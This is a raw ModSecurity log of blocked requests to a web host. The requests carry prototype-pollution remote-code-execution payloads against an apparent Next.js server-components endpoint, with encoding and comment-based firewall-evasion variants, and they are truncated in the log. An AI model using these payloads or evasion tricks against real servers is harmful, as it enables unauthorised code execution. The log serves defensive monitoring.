"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do7QAAARg"] [Sun Apr 05 15:42:28.516284 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:40610] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do7gAAAQ0"] [Sun Apr 05 15:42:28.627681 2026] [:error] [pid 23077:tid 23099] [client 172.94.9.253:40726] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSfQAAAdA"] [Sun Apr 05 15:42:28.627778 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:40698] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do8AAAAQk"] [Sun Apr 05 15:42:28.628960 2026] [:error] [pid 1503:tid 1519] [client 172.94.9.253:40742] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxEI7AjfUQYCN-J7DVgAAAMo"] [Sun Apr 05 15:42:28.629756 2026] [:error] [pid 1503:tid 1534] [client 172.94.9.253:40748] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxEI7AjfUQYCN-J7DVwAAANY"] [Sun Apr 05 15:42:28.629828 2026] [:error] [pid 1503:tid 1513] [client 172.94.9.253:40708] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxEI7AjfUQYCN-J7DWAAAAMQ"] [Sun Apr 05 15:42:28.641758 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:40674] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSfwAAAdM"] [Sun Apr 05 15:42:28.642399 2026] [:error] [pid 1309:tid 1381] [client 172.94.9.253:40716] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxD-XKUNJEHmNu6G7uAAAAIo"] [Sun Apr 05 15:42:28.643194 2026] [:error] [pid 23077:tid 23085] [client 172.94.9.253:40724] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSfgAAAcI"] [Sun Apr 05 15:42:28.661601 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:40700] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSewAAAdc"] [Sun Apr 05 15:42:28.663959 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:40682] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxJc83uMXRUE9zvQSfAAAAco"] [Sun Apr 05 15:42:28.757107 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:40750] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxJc83uMXRUE9zvQSgAAAAcc"] [Sun Apr 05 15:42:28.757124 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:40842] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do8gAAAQo"] [Sun Apr 05 15:42:28.759899 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:40792] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJmxLxQSOrq_iRTM7do8wAAAQQ"] [Sun Apr 05 15:42:28.760352 2026] [:error] [pid 1306:tid 1340] [client 172.94.9.253:40802] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxIRhslBlnapNAUOXjwAAABc"] [Sun Apr 05 15:42:28.761610 2026] [:error] [pid 13019:tid 13255] [client 172.94.9.253:40762] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do9AAAAQ8"] [Sun Apr 05 15:42:28.761647 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:40754] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJmxLxQSOrq_iRTM7do9QAAAQc"] [Sun Apr 05 15:42:28.761682 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:40828] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "adJmxEI7AjfUQYCN-J7DWgAAAMA"] [Sun Apr 05 15:42:28.762477 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:40786] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 